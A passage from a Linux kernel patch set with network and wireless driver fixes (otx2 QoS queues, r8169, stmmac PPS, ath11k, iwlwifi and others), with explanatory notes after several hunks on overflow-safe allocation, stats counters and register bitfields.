++		dma_unmap_page_attrs(pfvf->dev, iova, hw->sqb_size,
++				     DMA_FROM_DEVICE,
++				     DMA_ATTR_SKIP_CPU_SYNC);
++		put_page(virt_to_page(phys_to_virt(pa)));
++		otx2_aura_allocptr(pfvf, pool_id);
++	}
++	sq->sqb_count = 0;
++	kfree(sq->sqb_ptrs);
++pool_free:
++	qmem_free(pfvf->dev, pool->stack);
++aura_free:
++	qmem_free(pfvf->dev, pool->fc_addr);
++	otx2_mbox_reset(&pfvf->mbox.mbox, 0);
++	return err;
++}
++
++static void otx2_qos_sq_free_sqbs(struct otx2_nic *pfvf, int qidx)
++{
++	struct otx2_qset *qset = &pfvf->qset;
++	struct otx2_hw *hw = &pfvf->hw;
++	struct otx2_snd_queue *sq;
++	u64 iova, pa;
++	int sqb;
++
++	sq = &qset->sq[qidx];
++	if (!sq->sqb_ptrs)
++		return;
++	for (sqb = 0; sqb < sq->sqb_count; sqb++) {
++		if (!sq->sqb_ptrs[sqb])
++			continue;
++		iova = sq->sqb_ptrs[sqb];
++		pa = otx2_iova_to_phys(pfvf->iommu_domain, iova);
++		dma_unmap_page_attrs(pfvf->dev, iova, hw->sqb_size,
++				     DMA_FROM_DEVICE,
++				     DMA_ATTR_SKIP_CPU_SYNC);
++		put_page(virt_to_page(phys_to_virt(pa)));
++	}
++
++	sq->sqb_count = 0;
++
++	sq = &qset->sq[qidx];
++	qmem_free(pfvf->dev, sq->sqe);
++	qmem_free(pfvf->dev, sq->tso_hdrs);
++	kfree(sq->sg);
++	kfree(sq->sqb_ptrs);
++	qmem_free(pfvf->dev, sq->timestamps);
++
++	memset((void *)sq, 0, sizeof(*sq));
++}
++
++/* Give the hardware a moment to drain the given send queue id */
++static void otx2_qos_sqb_flush(struct otx2_nic *pfvf, int qidx)
++{
++	int sqe_tail, sqe_head;
++	u64 incr, *ptr, val;
++
++	ptr = (__force u64 *)otx2_get_regaddr(pfvf, NIX_LF_SQ_OP_STATUS);
++	incr = (u64)qidx << 32;
++	val = otx2_atomic64_add(incr, ptr);
++	sqe_head = (val >> 20) & 0x3F;
++	sqe_tail = (val >> 28) & 0x3F;
++	if (sqe_head != sqe_tail)
++		usleep_range(50, 60);
++}
++
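otx2_qos_sqb_flush() decodes the SQE head/tail pointers with open-coded shifts: (val >> 20) & 0x3F is bits 25:20 and (val >> 28) & 0x3F is bits 33:28 of NIX_LF_SQ_OP_STATUS. An equivalent spelling with the bitfield helpers, shown only to make the field positions explicit (the mask names are invented here):

	#include <linux/bitfield.h>
	#include <linux/bits.h>

	#define SQ_OP_STATUS_SQE_HEAD	GENMASK_ULL(25, 20)	/* (val >> 20) & 0x3F */
	#define SQ_OP_STATUS_SQE_TAIL	GENMASK_ULL(33, 28)	/* (val >> 28) & 0x3F */

	static void decode_sq_op_status(u64 val, int *head, int *tail)
	{
		*head = FIELD_GET(SQ_OP_STATUS_SQE_HEAD, val);
		*tail = FIELD_GET(SQ_OP_STATUS_SQE_TAIL, val);
	}
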
++static int otx2_qos_ctx_disable(struct otx2_nic *pfvf, u16 qidx, int aura_id)
++{
++	struct nix_cn10k_aq_enq_req *cn10k_sq_aq;
++	struct npa_aq_enq_req *aura_aq;
++	struct npa_aq_enq_req *pool_aq;
++	struct nix_aq_enq_req *sq_aq;
++
++	if (test_bit(CN10K_LMTST, &pfvf->hw.cap_flag)) {
++		cn10k_sq_aq = otx2_mbox_alloc_msg_nix_cn10k_aq_enq(&pfvf->mbox);
++		if (!cn10k_sq_aq)
++			return -ENOMEM;
++		cn10k_sq_aq->qidx = qidx;
++		cn10k_sq_aq->sq.ena = 0;
++		cn10k_sq_aq->sq_mask.ena = 1;
++		cn10k_sq_aq->ctype = NIX_AQ_CTYPE_SQ;
++		cn10k_sq_aq->op = NIX_AQ_INSTOP_WRITE;
++	} else {
++		sq_aq = otx2_mbox_alloc_msg_nix_aq_enq(&pfvf->mbox);
++		if (!sq_aq)
++			return -ENOMEM;
++		sq_aq->qidx = qidx;
++		sq_aq->sq.ena = 0;
++		sq_aq->sq_mask.ena = 1;
++		sq_aq->ctype = NIX_AQ_CTYPE_SQ;
++		sq_aq->op = NIX_AQ_INSTOP_WRITE;
++	}
++
++	aura_aq = otx2_mbox_alloc_msg_npa_aq_enq(&pfvf->mbox);
++	if (!aura_aq) {
++		otx2_mbox_reset(&pfvf->mbox.mbox, 0);
++		return -ENOMEM;
++	}
++
++	aura_aq->aura_id = aura_id;
++	aura_aq->aura.ena = 0;
++	aura_aq->aura_mask.ena = 1;
++	aura_aq->ctype = NPA_AQ_CTYPE_AURA;
++	aura_aq->op = NPA_AQ_INSTOP_WRITE;
++
++	pool_aq = otx2_mbox_alloc_msg_npa_aq_enq(&pfvf->mbox);
++	if (!pool_aq) {
++		otx2_mbox_reset(&pfvf->mbox.mbox, 0);
++		return -ENOMEM;
++	}
++
++	pool_aq->aura_id = aura_id;
++	pool_aq->pool.ena = 0;
++	pool_aq->pool_mask.ena = 1;
++
++	pool_aq->ctype = NPA_AQ_CTYPE_POOL;
++	pool_aq->op = NPA_AQ_INSTOP_WRITE;
++
++	return otx2_sync_mbox_msg(&pfvf->mbox);
++}
++
++int otx2_qos_enable_sq(struct otx2_nic *pfvf, int qidx, u16 smq)
++{
++	struct otx2_hw *hw = &pfvf->hw;
++	int pool_id, sq_idx, err;
++
++	if (pfvf->flags & OTX2_FLAG_INTF_DOWN)
++		return -EPERM;
++
++	sq_idx = hw->non_qos_queues + qidx;
++
++	mutex_lock(&pfvf->mbox.lock);
++	err = otx2_qos_sq_aura_pool_init(pfvf, sq_idx);
++	if (err)
++		goto out;
++
++	pool_id = otx2_get_pool_idx(pfvf, AURA_NIX_SQ, sq_idx);
++	pfvf->qos.qid_to_sqmap[qidx] = smq;
++	err = otx2_sq_init(pfvf, sq_idx, pool_id);
++	if (err)
++		goto out;
++out:
++	mutex_unlock(&pfvf->mbox.lock);
++	return err;
++}
++
++void otx2_qos_disable_sq(struct otx2_nic *pfvf, int qidx, u16 mdq)
++{
++	struct otx2_qset *qset = &pfvf->qset;
++	struct otx2_hw *hw = &pfvf->hw;
++	struct otx2_snd_queue *sq;
++	struct otx2_cq_queue *cq;
++	int pool_id, sq_idx;
++
++	sq_idx = hw->non_qos_queues + qidx;
++
++	/* If the DOWN flag is set, SQs are already freed */
++	if (pfvf->flags & OTX2_FLAG_INTF_DOWN)
++		return;
++
++	sq = &pfvf->qset.sq[sq_idx];
++	if (!sq->sqb_ptrs)
++		return;
++
++	if (sq_idx < hw->non_qos_queues ||
++	    sq_idx >= otx2_get_total_tx_queues(pfvf)) {
++		netdev_err(pfvf->netdev, "Send Queue is not a QoS queue\n");
++		return;
++	}
++
++	cq = &qset->cq[pfvf->hw.rx_queues + sq_idx];
++	pool_id = otx2_get_pool_idx(pfvf, AURA_NIX_SQ, sq_idx);
++
++	otx2_qos_sqb_flush(pfvf, sq_idx);
++	otx2_smq_flush(pfvf, otx2_get_smq_idx(pfvf, sq_idx));
++	otx2_cleanup_tx_cqes(pfvf, cq);
++
++	mutex_lock(&pfvf->mbox.lock);
++	otx2_qos_ctx_disable(pfvf, sq_idx, pool_id);
++	mutex_unlock(&pfvf->mbox.lock);
++
++	otx2_qos_sq_free_sqbs(pfvf, sq_idx);
++	otx2_qos_aura_pool_free(pfvf, pool_id);
++}
+diff --git a/drivers/net/ethernet/mediatek/mtk_wed_regs.h b/drivers/net/ethernet/mediatek/mtk_wed_regs.h
+index e270fb3361432..14cd44f8191ba 100644
+--- a/drivers/net/ethernet/mediatek/mtk_wed_regs.h
++++ b/drivers/net/ethernet/mediatek/mtk_wed_regs.h
+@@ -51,8 +51,8 @@ struct mtk_wdma_desc {
+ #define MTK_WED_EXT_INT_STATUS_TKID_TITO_INVALID	BIT(4)
+ #define MTK_WED_EXT_INT_STATUS_TX_FBUF_LO_TH		BIT(8)
+ #define MTK_WED_EXT_INT_STATUS_TX_FBUF_HI_TH		BIT(9)
+-#define MTK_WED_EXT_INT_STATUS_RX_FBUF_LO_TH		BIT(12)
+-#define MTK_WED_EXT_INT_STATUS_RX_FBUF_HI_TH		BIT(13)
++#define MTK_WED_EXT_INT_STATUS_RX_FBUF_LO_TH		BIT(10) /* wed v2 */
++#define MTK_WED_EXT_INT_STATUS_RX_FBUF_HI_TH		BIT(11) /* wed v2 */
+ #define MTK_WED_EXT_INT_STATUS_RX_DRV_R_RESP_ERR	BIT(16)
+ #define MTK_WED_EXT_INT_STATUS_RX_DRV_W_RESP_ERR	BIT(17)
+ #define MTK_WED_EXT_INT_STATUS_RX_DRV_COHERENT		BIT(18)
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_bloom_filter.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_bloom_filter.c
+index e2aced7ab4547..95f63fcf4ba1f 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_bloom_filter.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_bloom_filter.c
+@@ -496,7 +496,7 @@ mlxsw_sp_acl_bf_init(struct mlxsw_sp *mlxsw_sp, unsigned int num_erp_banks)
+ 	 * is 2^ACL_MAX_BF_LOG
+ 	 */
+ 	bf_bank_size = 1 << MLXSW_CORE_RES_GET(mlxsw_sp->core, ACL_MAX_BF_LOG);
+-	bf = kzalloc(struct_size(bf, refcnt, bf_bank_size * num_erp_banks),
++	bf = kzalloc(struct_size(bf, refcnt, size_mul(bf_bank_size, num_erp_banks)),
+ 		     GFP_KERNEL);
+ 	if (!bf)
+ 		return ERR_PTR(-ENOMEM);
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index 80b6079b8a8e3..d14706265d9cb 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -2512,9 +2512,13 @@ static void rtl_set_rx_mode(struct net_device *dev)
+ 
+ 	if (dev->flags & IFF_PROMISC) {
+ 		rx_mode |= AcceptAllPhys;
++	} else if (!(dev->flags & IFF_MULTICAST)) {
++		rx_mode &= ~AcceptMulticast;
+ 	} else if (netdev_mc_count(dev) > MC_FILTER_LIMIT ||
+ 		   dev->flags & IFF_ALLMULTI ||
+-		   tp->mac_version == RTL_GIGA_MAC_VER_35) {
++		   tp->mac_version == RTL_GIGA_MAC_VER_35 ||
++		   tp->mac_version == RTL_GIGA_MAC_VER_46 ||
++		   tp->mac_version == RTL_GIGA_MAC_VER_48) {
+ 		/* accept all multicasts */
+ 	} else if (netdev_mc_empty(dev)) {
+ 		rx_mode &= ~AcceptMulticast;
+@@ -4556,12 +4560,17 @@ static int rtl8169_poll(struct napi_struct *napi, int budget)
+ static void r8169_phylink_handler(struct net_device *ndev)
+ {
+ 	struct rtl8169_private *tp = netdev_priv(ndev);
++	struct device *d = tp_to_dev(tp);
+ 
+ 	if (netif_carrier_ok(ndev)) {
+ 		rtl_link_chg_patch(tp);
+-		pm_request_resume(&tp->pci_dev->dev);
++		pm_request_resume(d);
++		netif_wake_queue(tp->dev);
+ 	} else {
+-		pm_runtime_idle(&tp->pci_dev->dev);
++		/* In a few cases RX is otherwise broken after link-down */
++		if (rtl_is_8125(tp))
++			rtl_reset_work(tp);
++		pm_runtime_idle(d);
+ 	}
+ 
+ 	phy_print_status(tp->phydev);
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2.h b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2.h
+index 1913385df6856..880a75bf2eb1f 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2.h
++++ b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2.h
+@@ -222,7 +222,7 @@
+ 	((val) << XGMAC_PPS_MINIDX(x))
+ #define XGMAC_PPSCMD_START		0x2
+ #define XGMAC_PPSCMD_STOP		0x5
+-#define XGMAC_PPSEN0			BIT(4)
++#define XGMAC_PPSENx(x)			BIT(4 + (x) * 8)
+ #define XGMAC_PPSx_TARGET_TIME_SEC(x)	(0x00000d80 + (x) * 0x10)
+ #define XGMAC_PPSx_TARGET_TIME_NSEC(x)	(0x00000d84 + (x) * 0x10)
+ #define XGMAC_TRGTBUSY0			BIT(31)
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+index c6c4d7948fe5f..f30e08a106cbe 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+@@ -1135,7 +1135,19 @@ static int dwxgmac2_flex_pps_config(void __iomem *ioaddr, int index,
+ 
+ 	val |= XGMAC_PPSCMDx(index, XGMAC_PPSCMD_START);
+ 	val |= XGMAC_TRGTMODSELx(index, XGMAC_PPSCMD_START);
+-	val |= XGMAC_PPSEN0;
++
++	/* XGMAC Core has 4 PPS outputs at most.
++	 *
++	 * Prior to XGMAC Core 3.20, only PPS0 can select between Fixed
++	 * and Flexible mode, via PPSEN0. PPS{1,2,3} are in Flexible mode
++	 * by default and cannot be switched to Fixed mode, since
++	 * PPSEN{1,2,3} are read-only, reserved to 0.
++	 * Setting PPSEN{1,2,3} anyway does not make things worse ;-)
++	 *
++	 * From XGMAC Core 3.20 and later, PPSEN{0,1,2,3} are writable and must
++	 * be set, or the PPS outputs stay in Fixed PPS mode by default.
++	 */
++	val |= XGMAC_PPSENx(index);
+ 
+ 	writel(cfg->start.tv_sec, ioaddr + XGMAC_PPSx_TARGET_TIME_SEC(index));
+ 
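The old code set bit 4 (the former XGMAC_PPSEN0) no matter which output was being configured. Each PPS output owns an 8-bit field in the PPS control register, so the enable bit for output x sits at position 4 + 8 * x, which is exactly what XGMAC_PPSENx() encodes. A standalone check of the expansion:

	#include <stdio.h>

	#define BIT(n)		(1U << (n))
	#define XGMAC_PPSENx(x)	BIT(4 + (x) * 8)

	int main(void)
	{
		for (int x = 0; x < 4; x++)	/* PPS0..PPS3 */
			printf("PPSEN%d = bit %2d = 0x%08x\n",
			       x, 4 + x * 8, XGMAC_PPSENx(x));
		return 0;
	}
	/* PPSEN0 = bit  4 = 0x00000010
	 * PPSEN1 = bit 12 = 0x00001000
	 * PPSEN2 = bit 20 = 0x00100000
	 * PPSEN3 = bit 28 = 0x10000000
	 */
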
+diff --git a/drivers/net/ethernet/toshiba/spider_net.c b/drivers/net/ethernet/toshiba/spider_net.c
+index 50d7eacfec582..87e67121477cb 100644
+--- a/drivers/net/ethernet/toshiba/spider_net.c
++++ b/drivers/net/ethernet/toshiba/spider_net.c
+@@ -2332,7 +2332,7 @@ spider_net_alloc_card(void)
+ 	struct spider_net_card *card;
+ 
+ 	netdev = alloc_etherdev(struct_size(card, darray,
+-					    tx_descriptors + rx_descriptors));
++					    size_add(tx_descriptors, rx_descriptors)));
+ 	if (!netdev)
+ 		return NULL;
+ 
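Both this hunk and the mlxsw one above push the size arithmetic through the <linux/overflow.h> helpers: struct_size() computes "header plus trailing flexible array" safely, and size_mul()/size_add() saturate at SIZE_MAX instead of wrapping, so an overflowing count becomes a failed allocation rather than an undersized buffer indexed out of bounds later. The idiom, sketched on an invented structure:

	#include <linux/overflow.h>
	#include <linux/slab.h>

	struct bank_table {
		unsigned int num_banks;
		unsigned int refcnt[];		/* flexible array member */
	};

	static struct bank_table *bank_table_alloc(size_t bank_size,
						   size_t num_banks)
	{
		struct bank_table *bt;

		/* size_mul() saturates on overflow, struct_size() then
		 * saturates too, and kzalloc(SIZE_MAX, ...) simply fails.
		 */
		bt = kzalloc(struct_size(bt, refcnt,
					 size_mul(bank_size, num_banks)),
			     GFP_KERNEL);
		return bt;			/* NULL on failure */
	}
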
+diff --git a/drivers/net/ipvlan/ipvlan_core.c b/drivers/net/ipvlan/ipvlan_core.c
+index 59e29e08398a0..b29b7d97b7739 100644
+--- a/drivers/net/ipvlan/ipvlan_core.c
++++ b/drivers/net/ipvlan/ipvlan_core.c
+@@ -441,12 +441,12 @@ static int ipvlan_process_v4_outbound(struct sk_buff *skb)
+ 
+ 	err = ip_local_out(net, skb->sk, skb);
+ 	if (unlikely(net_xmit_eval(err)))
+-		dev->stats.tx_errors++;
++		DEV_STATS_INC(dev, tx_errors);
+ 	else
+ 		ret = NET_XMIT_SUCCESS;
+ 	goto out;
+ err:
+-	dev->stats.tx_errors++;
++	DEV_STATS_INC(dev, tx_errors);
+ 	kfree_skb(skb);
+ out:
+ 	return ret;
+@@ -482,12 +482,12 @@ static int ipvlan_process_v6_outbound(struct sk_buff *skb)
+ 
+ 	err = ip6_local_out(net, skb->sk, skb);
+ 	if (unlikely(net_xmit_eval(err)))
+-		dev->stats.tx_errors++;
++		DEV_STATS_INC(dev, tx_errors);
+ 	else
+ 		ret = NET_XMIT_SUCCESS;
+ 	goto out;
+ err:
+-	dev->stats.tx_errors++;
++	DEV_STATS_INC(dev, tx_errors);
+ 	kfree_skb(skb);
+ out:
+ 	return ret;
+diff --git a/drivers/net/ipvlan/ipvlan_main.c b/drivers/net/ipvlan/ipvlan_main.c
+index cd16bc8bf154c..fbf2d5b67aafa 100644
+--- a/drivers/net/ipvlan/ipvlan_main.c
++++ b/drivers/net/ipvlan/ipvlan_main.c
+@@ -324,6 +324,7 @@ static void ipvlan_get_stats64(struct net_device *dev,
+ 		s->rx_dropped = rx_errs;
+ 		s->tx_dropped = tx_drps;
+ 	}
++	s->tx_errors = DEV_STATS_READ(dev, tx_errors);
+ }
+ 
+ static int ipvlan_vlan_rx_add_vid(struct net_device *dev, __be16 proto, u16 vid)
+diff --git a/drivers/net/macsec.c b/drivers/net/macsec.c
+index 81453e84b6413..209ee9f352754 100644
+--- a/drivers/net/macsec.c
++++ b/drivers/net/macsec.c
+@@ -3664,9 +3664,9 @@ static void macsec_get_stats64(struct net_device *dev,
+ 
+ 	dev_fetch_sw_netstats(s, dev->tstats);
+ 
+-	s->rx_dropped = atomic_long_read(&dev->stats.__rx_dropped);
+-	s->tx_dropped = atomic_long_read(&dev->stats.__tx_dropped);
+-	s->rx_errors = atomic_long_read(&dev->stats.__rx_errors);
++	s->rx_dropped = DEV_STATS_READ(dev, rx_dropped);
++	s->tx_dropped = DEV_STATS_READ(dev, tx_dropped);
++	s->rx_errors = DEV_STATS_READ(dev, rx_errors);
+ }
+ 
+ static int macsec_get_iflink(const struct net_device *dev)
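The ipvlan and macsec hunks move to the DEV_STATS_INC()/DEV_STATS_READ() accessors. The core net_device stats fields are unions of a plain counter and an atomic_long_t, and a bare dev->stats.tx_errors++ from concurrent transmit contexts can lose increments; the macros update and read the atomic view instead. The pattern, as a sketch with illustrative helper names:

	#include <linux/netdevice.h>

	/* Safe against concurrent callers on different CPUs. */
	static void record_tx_error(struct net_device *dev)
	{
		DEV_STATS_INC(dev, tx_errors);
	}

	static void fill_stats64(struct net_device *dev,
				 struct rtnl_link_stats64 *s)
	{
		s->tx_errors = DEV_STATS_READ(dev, tx_errors);
	}
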
+diff --git a/drivers/net/wireless/ath/ath11k/mac.c b/drivers/net/wireless/ath/ath11k/mac.c
+index cb77dd6ce9665..21c6b36dc6ebb 100644
+--- a/drivers/net/wireless/ath/ath11k/mac.c
++++ b/drivers/net/wireless/ath/ath11k/mac.c
+@@ -8549,6 +8549,14 @@ static int ath11k_mac_op_get_txpower(struct ieee80211_hw *hw,
+ 	if (ar->state != ATH11K_STATE_ON)
+ 		goto err_fallback;
+ 
++	/* Firmware doesn't provide Tx power during CAC hence no need to fetch
++	 * the stats.
++	 */
++	if (test_bit(ATH11K_CAC_RUNNING, &ar->dev_flags)) {
++		mutex_unlock(&ar->conf_mutex);
++		return -EAGAIN;
++	}
++
+ 	req_param.pdev_id = ar->pdev->pdev_id;
+ 	req_param.stats_id = WMI_REQUEST_PDEV_STAT;
+ 
+diff --git a/drivers/net/wireless/ath/ath11k/pci.c b/drivers/net/wireless/ath/ath11k/pci.c
+index 3953ebd551bf8..79d2876a46b53 100644
+--- a/drivers/net/wireless/ath/ath11k/pci.c
++++ b/drivers/net/wireless/ath/ath11k/pci.c
+@@ -853,10 +853,16 @@ unsupported_wcn6855_soc:
+ 	if (ret)
+ 		goto err_pci_disable_msi;
+ 
++	ret = ath11k_pci_set_irq_affinity_hint(ab_pci, cpumask_of(0));
++	if (ret) {
++		ath11k_err(ab, "failed to set irq affinity %d\n", ret);
++		goto err_pci_disable_msi;
++	}
++
+ 	ret = ath11k_mhi_register(ab_pci);
+ 	if (ret) {
+ 		ath11k_err(ab, "failed to register mhi: %d\n", ret);
+-		goto err_pci_disable_msi;
++		goto err_irq_affinity_cleanup;
+ 	}
+ 
+ 	ret = ath11k_hal_srng_init(ab);
+@@ -877,12 +883,6 @@ unsupported_wcn6855_soc:
+ 		goto err_ce_free;
+ 	}
+ 
+-	ret = ath11k_pci_set_irq_affinity_hint(ab_pci, cpumask_of(0));
+-	if (ret) {
+-		ath11k_err(ab, "failed to set irq affinity %d\n", ret);
+-		goto err_free_irq;
+-	}
+-
+ 	/* kernel may allocate a dummy vector before request_irq and
+ 	 * then allocate a real vector when request_irq is called.
+ 	 * So get msi_data here again to avoid spurious interrupt
+@@ -891,19 +891,16 @@ unsupported_wcn6855_soc:
+ 	ret = ath11k_pci_config_msi_data(ab_pci);
+ 	if (ret) {
+ 		ath11k_err(ab, "failed to config msi_data: %d\n", ret);
+-		goto err_irq_affinity_cleanup;
++		goto err_free_irq;
+ 	}
+ 
+ 	ret = ath11k_core_init(ab);
+ 	if (ret) {
+ 		ath11k_err(ab, "failed to init core: %d\n", ret);
+-		goto err_irq_affinity_cleanup;
++		goto err_free_irq;
+ 	}
+ 	return 0;
+ 
+-err_irq_affinity_cleanup:
+-	ath11k_pci_set_irq_affinity_hint(ab_pci, NULL);
+-
+ err_free_irq:
+ 	ath11k_pcic_free_irq(ab);
+ 
+@@ -916,6 +913,9 @@ err_hal_srng_deinit:
+ err_mhi_unregister:
+ 	ath11k_mhi_unregister(ab_pci);
+ 
++err_irq_affinity_cleanup:
++	ath11k_pci_set_irq_affinity_hint(ab_pci, NULL);
++
+ err_pci_disable_msi:
+ 	ath11k_pci_free_msi(ab_pci);
+ 
+diff --git a/drivers/net/wireless/ath/dfs_pattern_detector.c b/drivers/net/wireless/ath/dfs_pattern_detector.c
+index 27f4d74a41c80..2788a1b06c17c 100644
+--- a/drivers/net/wireless/ath/dfs_pattern_detector.c
++++ b/drivers/net/wireless/ath/dfs_pattern_detector.c
+@@ -206,7 +206,7 @@ channel_detector_create(struct dfs_pattern_detector *dpd, u16 freq)
+ 
+ 	INIT_LIST_HEAD(&cd->head);
+ 	cd->freq = freq;
+-	cd->detectors = kmalloc_array(dpd->num_radar_types,
++	cd->detectors = kcalloc(dpd->num_radar_types,
+ 				      sizeof(*cd->detectors), GFP_ATOMIC);
+ 	if (cd->detectors == NULL)
+ 		goto fail;
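Two properties change with kcalloc(): the num_radar_types * sizeof(*cd->detectors) multiply stays overflow-checked (as it was with kmalloc_array()), and the array comes back zeroed. The zeroing appears to be the actual fix: if a later allocation in this function fails, the cleanup path walks the detectors array, and slots that were never populated must read as NULL rather than as uninitialized heap contents. In short (illustrative helper):

	#include <linux/slab.h>

	/* kmalloc_array(): overflow-checked multiply, uninitialized memory.
	 * kcalloc():       overflow-checked multiply, zeroed memory; an
	 *                  early error path that walks the array sees NULL
	 *                  in every slot it has not filled yet.
	 */
	static void **alloc_ptr_table(size_t n, gfp_t gfp)
	{
		return kcalloc(n, sizeof(void *), gfp);
	}
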
+diff --git a/drivers/net/wireless/intel/iwlwifi/dvm/tx.c b/drivers/net/wireless/intel/iwlwifi/dvm/tx.c
+index 60a7b61d59aa3..ca1daec641c4f 100644
+--- a/drivers/net/wireless/intel/iwlwifi/dvm/tx.c
++++ b/drivers/net/wireless/intel/iwlwifi/dvm/tx.c
+@@ -3,6 +3,7 @@
+  *
+  * Copyright(c) 2008 - 2014 Intel Corporation. All rights reserved.
+  * Copyright (C) 2019 Intel Corporation
++ * Copyright (C) 2023 Intel Corporation
+  *****************************************************************************/
+ 
+ #include <linux/kernel.h>
+@@ -1169,7 +1170,7 @@ void iwlagn_rx_reply_tx(struct iwl_priv *priv, struct iwl_rx_cmd_buffer *rxb)
+ 			iwlagn_check_ratid_empty(priv, sta_id, tid);
+ 		}
+ 
+-		iwl_trans_reclaim(priv->trans, txq_id, ssn, &skbs);
++		iwl_trans_reclaim(priv->trans, txq_id, ssn, &skbs, false);
+ 
+ 		freed = 0;
+ 
+@@ -1315,7 +1316,7 @@ void iwlagn_rx_reply_compressed_ba(struct iwl_priv *priv,
+ 	 * block-ack window (we assume that they've been successfully
+ 	 * transmitted ... if not, it's too late anyway). */
+ 	iwl_trans_reclaim(priv->trans, scd_flow, ba_resp_scd_ssn,
+-			  &reclaimed_skbs);
++			  &reclaimed_skbs, false);
+ 
+ 	IWL_DEBUG_TX_REPLY(priv, "REPLY_COMPRESSED_BA [%d] Received from %pM, "
+ 			   "sta_id = %d\n",
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/api/dbg-tlv.h b/drivers/net/wireless/intel/iwlwifi/fw/api/dbg-tlv.h
+index ba538d70985f4..39bee9c00e071 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/api/dbg-tlv.h
++++ b/drivers/net/wireless/intel/iwlwifi/fw/api/dbg-tlv.h
+@@ -13,6 +13,7 @@
+ #define IWL_FW_INI_DOMAIN_ALWAYS_ON		0
+ #define IWL_FW_INI_REGION_ID_MASK		GENMASK(15, 0)
+ #define IWL_FW_INI_REGION_DUMP_POLICY_MASK	GENMASK(31, 16)
++#define IWL_FW_INI_PRESET_DISABLE		0xff
+ 
+ /**
+  * struct iwl_fw_ini_hcmd
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.h b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.h
+index 128059ca77e60..06fb7d6653905 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.h
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.h
+@@ -1,6 +1,6 @@
+ /* SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause */
+ /*
+- * Copyright (C) 2018-2022 Intel Corporation
++ * Copyright (C) 2018-2023 Intel Corporation
+  */
+ #ifndef __iwl_dbg_tlv_h__
+ #define __iwl_dbg_tlv_h__
+@@ -10,7 +10,8 @@
+ #include <fw/file.h>
+ #include <fw/api/dbg-tlv.h>
+ 
+-#define IWL_DBG_TLV_MAX_PRESET 15
++#define IWL_DBG_TLV_MAX_PRESET	15
++#define ENABLE_INI		(IWL_DBG_TLV_MAX_PRESET + 1)
+ 
+ /**
+  * struct iwl_dbg_tlv_node - debug TLV node
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-drv.c b/drivers/net/wireless/intel/iwlwifi/iwl-drv.c
+index a2203f661321c..5eba1a355f043 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-drv.c
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-drv.c
+@@ -1722,6 +1722,22 @@ struct iwl_drv *iwl_drv_start(struct iwl_trans *trans)
+ #endif
+ 
+ 	drv->trans->dbg.domains_bitmap = IWL_TRANS_FW_DBG_DOMAIN(drv->trans);
++	if (iwlwifi_mod_params.enable_ini != ENABLE_INI) {
++		/* We have a non-default value in the module parameter,
++		 * so take its value.
++		 */
++		drv->trans->dbg.domains_bitmap &= 0xffff;
++		if (iwlwifi_mod_params.enable_ini != IWL_FW_INI_PRESET_DISABLE) {
++			if (iwlwifi_mod_params.enable_ini > ENABLE_INI) {
++				IWL_ERR(trans,
++					"invalid enable_ini module parameter value: max = %d, using 0 instead\n",
++					ENABLE_INI);
++				iwlwifi_mod_params.enable_ini = 0;
++			}
++			drv->trans->dbg.domains_bitmap =
++				BIT(IWL_FW_DBG_DOMAIN_POS + iwlwifi_mod_params.enable_ini);
++		}
++	}
+ 
+ 	ret = iwl_request_firmware(drv, true);
+ 	if (ret) {
+@@ -1770,8 +1786,6 @@ void iwl_drv_stop(struct iwl_drv *drv)
+ 	kfree(drv);
+ }
+ 
+-#define ENABLE_INI	(IWL_DBG_TLV_MAX_PRESET + 1)
+-
+ /* shared module parameters */
+ struct iwl_mod_params iwlwifi_mod_params = {
+ 	.fw_restart = true,
+@@ -1891,38 +1905,7 @@ module_param_named(uapsd_disable, iwlwifi_mod_params.uapsd_disable, uint, 0644);
+ MODULE_PARM_DESC(uapsd_disable,
+ 		 "disable U-APSD functionality bitmap 1: BSS 2: P2P Client (default: 3)");
+ 
+-static int enable_ini_set(const char *arg, const struct kernel_param *kp)
+-{
+-	int ret = 0;
+-	bool res;
+-	__u32 new_enable_ini;
+-
+-	/* in case the argument type is a number */
+-	ret = kstrtou32(arg, 0, &new_enable_ini);
+-	if (!ret) {
+-		if (new_enable_ini > ENABLE_INI) {
+-			pr_err("enable_ini cannot be %d, in range 0-16\n", new_enable_ini);
+-			return -EINVAL;
+-		}
+-		goto out;
+-	}
+-
+-	/* in case the argument type is boolean */
+-	ret = kstrtobool(arg, &res);
+-	if (ret)
+-		return ret;
+-	new_enable_ini = (res ? ENABLE_INI : 0);
+-
+-out:
+-	iwlwifi_mod_params.enable_ini = new_enable_ini;
+-	return 0;
+-}
+-
+-static const struct kernel_param_ops enable_ini_ops = {
+-	.set = enable_ini_set
+-};
+-
+-module_param_cb(enable_ini, &enable_ini_ops, &iwlwifi_mod_params.enable_ini, 0644);
++module_param_named(enable_ini, iwlwifi_mod_params.enable_ini, uint, 0444);
+ MODULE_PARM_DESC(enable_ini,
+ 		 "0:disable, 1-15:FW_DBG_PRESET Values, 16:enabled without preset value defined,"
+ 		 "Debug INI TLV FW debug infrastructure (default: 16)");
